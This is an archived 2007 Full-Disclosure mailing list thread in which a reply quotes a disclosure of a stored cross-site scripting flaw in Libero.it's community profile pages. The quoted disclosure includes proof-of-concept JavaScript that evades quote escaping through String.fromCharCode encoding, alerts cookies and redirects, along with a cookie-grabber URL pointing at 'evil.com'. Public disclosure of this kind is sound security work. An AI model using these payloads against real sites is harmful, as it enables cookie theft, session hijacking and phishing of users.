lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Thu, 29 Mar 2007 09:03:45 -0400 From: Kradorex Xeron <admin@...ibase.ca> To: full-disclosure@...ts.grok.org.uk Subject: Re: Another XSS vulnerability in Italian provider Libero.it They probably need to redo their entire site's scripts, I wouldn't doubt there's a few more exploits in there somewhere. -- 2+ exploits within one site in one month is pretty sad. On Wednesday 28 March 2007 12:17, LK wrote: > After the report of Rosario Valotta on this ML, another XSS vulnerability > has been found on Libero.it, one of the most important italian ISP > (www.libero.it). > > Nothing more than a trivial error but, since Libero.it staff used the > printed media to inform that Rosario's find was just a "spot" issue, it is > important to demonstrate that this kind of errors are quite more > widespread and to let the Libero staff and management realize that a > potential attack must be avoid by a deep check of the portal. > > The vulnerability once again can be found in the "Community" section > of Libero portal, and the affected functionality is the profile > creation and retrieval > > <http://digiland.libero.it/profilo.phtml?nick=XssForFun&top=1>. > > The implementation of this functionality allows the injection of > malicious code in the profile, so that an attacker by visiting his/her > profile can: > > 1) steal username (in cookie) > 2) steal cookies > 3) arbitrary redirection for Phishing purpose > > The normal URL would be something linked like this: > > http://digiland.libero.it/profilo.phtml?nick=Nick&top=1 > > where "Nick" is the name of the nick whose profile has been > manipulated or crafted to add arbitrary code. > > This vulnerability closely resemble to those in MySpace and other > communities. > So it's nothing really complicated and you can skip on from here on ;) > > In admin pages (need to be logged by creating a fake account) on page > > http://digiland.libero.it/profilo_add.php?nocache=1175076655 > > there are two different fields named "I miei difetti:" (my defects) > and "i miei pregi:" (my strong points) that accept arbitrary content. > > As stated by Rosario, the Libero.it web application performs a simple > parsing of the posted content, so that quote and double-quote (' and ") > chars are escaped by putting a \ before of them (both using ASCII and URL > encoding). > > While I already had the Rosario's beautiful implementation of a simple > evasion technique I preferred to encode the single char in an old > snippet of mine. > The aim of the snippet (I don't remember if I made it, stole it, stole > only the main idea or where, sorry) is to transform a string into a > series of char numbers to be used with a String.fromCharCode command. > Due to the limitation in size, the function which create the > String.fromCharCode sequence is a detached and ascii value is > decreased of 100 to limit the number of digits. > This is the creation snippet: > > <script> > var toBenc = "hettp://www.lastknight.com"; > var result = ""; > > for (var k = 0; k < carlo.length; k++) > { > result += ("e(" + (toBenc .charCodeAt(k) - 100) + ")+"); > } > > document.write(result + "<br>") > </script> > > So URL "http://www.lastknight.com" is rendered as: > > e(4)+e(16)+e(16)+e(12)+e(-42)+e(-53)+e(-53)+e(19)+e(19) > +e(19)+e(-54)+e(8)+e(-3)+e(15)+e(16)+e(7)+e(10)+e(5)+e(3) > +e(4)+e(16)+e(-54)+e(-1)+e(11)+e(9); > > > Using the two boxes we can use the following code for a POC: > > [BOX 1] > <script> > function e(A) { > return String.fromCharCode(A + 100) > } > alert(document.cookie); > </script> > > [BOX 2] > <script> > var k = > e(4)+e(16)+e(16)+e(12)+e(-42)+e(-53)+e(-53)+e(19)+e(19)+e(19)+e(-54)+e(8); > k += > e(-3)+e(15)+e(16)+e(7)+e(10)+e(5)+e(3)+e(4)+e(16)+e(-54)+e(-1)+e(11)+e(9); > alert(k); > window.location = k; > </script> > > The posting url can be easily modified to an http grabber such as: > > <http://evil.com/grab?c="+encodeURI(document.cookie);> > > or (much more dangerous) to a phishing site. > > Session Riding and derived problems have not been tested but many italian > security experts are working on it. > > A POC url is available (until not deleted) here: > > <http://digiland.libero.it/profilo.phtml?nick=XssForFun&top=1> > > Just my 2 cents and thanks to: > > <Rosario Valotta> for the first report, upon which this is based > <SharDick> for help in JS ;) > <Vokda && Zen> for consultancy and typo-killing ;) > > > Greetings, > > MgpF > > > Permanent Url: <http://www.lastknight.com/libero-xss/> _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists